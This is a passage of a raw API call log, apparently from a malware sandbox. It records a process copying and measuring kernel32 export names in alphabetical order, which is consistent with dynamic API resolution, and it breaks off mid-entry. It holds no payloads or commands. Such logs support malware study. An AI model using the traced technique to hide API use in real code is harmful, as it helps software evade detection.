[0079.247] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.247] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.247] lstrlenA (lpString="ADDATOMA") returned 8 [0079.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.247] lstrlenA (lpString="ADDATOMW") returned 8 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.248] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.248] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.248] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.248] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.248] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.248] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.248] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.248] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.248] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.248] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.248] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.248] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.248] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.248] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.248] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.248] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.249] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.249] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.249] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.249] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.249] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.249] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.249] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.249] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.249] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.249] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.249] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.249] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.249] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.249] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.249] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.249] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.249] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.250] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.250] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.250] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.250] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.250] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.250] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.250] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.250] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.250] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.250] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.250] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.250] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.250] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.250] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.250] lstrlenA (lpString="BEEP") returned 4 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.250] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.250] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.250] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.250] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.251] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.251] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.251] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.251] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.251] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.251] lstrlenA (lpString="CANCELIO") returned 8 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.251] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.251] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.251] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.251] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.251] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.251] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.251] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.251] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.251] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.251] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.251] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.252] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.252] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.252] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.252] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.252] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.252] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.252] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.252] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.252] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.252] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.252] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.252] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.252] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.253] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.253] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.253] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.253] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.253] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.253] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.253] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.253] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.253] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.253] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.253] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.253] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.253] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.253] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.253] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.253] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.253] lstrlenA (lpString="COPYFILEA") returned 9 [0079.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.255] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.255] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.255] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.255] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.255] lstrlenA (lpString="COPYFILEW") returned 9 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.255] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.255] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.255] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.255] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.255] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: 